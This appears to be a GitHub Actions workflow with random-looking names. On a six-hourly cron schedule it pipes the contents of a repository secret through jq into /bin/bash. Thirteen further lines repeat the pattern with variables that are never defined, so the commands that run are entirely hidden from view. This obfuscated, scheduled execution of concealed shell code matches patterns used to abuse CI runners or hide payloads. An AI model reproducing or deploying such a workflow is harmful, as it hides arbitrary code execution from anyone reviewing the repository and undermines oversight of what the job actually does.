name: zhangdiaoyu4617

on:
  workflow_dispatch:
  schedule:
    - cron: '37 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangdiaoyu4617
        env:
          aasgi3: ${{ secrets.aasgi3 }}
        run: |
          echo $aasgi3 | jq -r .uo25 | /bin/bash
          echo $ml6 | jq -r .jy4 | /bin/bash
          echo $jhub7 | jq -r .xtm488 | /bin/bash
          echo $j9 | jq -r .zgqyd4541 | /bin/bash
          echo $xxd97 | jq -r .ewa4199 | /bin/bash
          echo $czod3628 | jq -r .sb05 | /bin/bash
          echo $zc87 | jq -r .yni8042 | /bin/bash
          echo $gux1690 | jq -r .vm8729 | /bin/bash
          echo $z55 | jq -r .hr44366 | /bin/bash
          echo $b31 | jq -r .gc1005 | /bin/bash
          echo $wanod5 | jq -r .ewc3 | /bin/bash
          echo $fio92120 | jq -r .jtuup839 | /bin/bash
          echo $os3 | jq -r .tkver96754 | /bin/bash
          echo $kft68 | jq -r .diuft5772 | /bin/bash

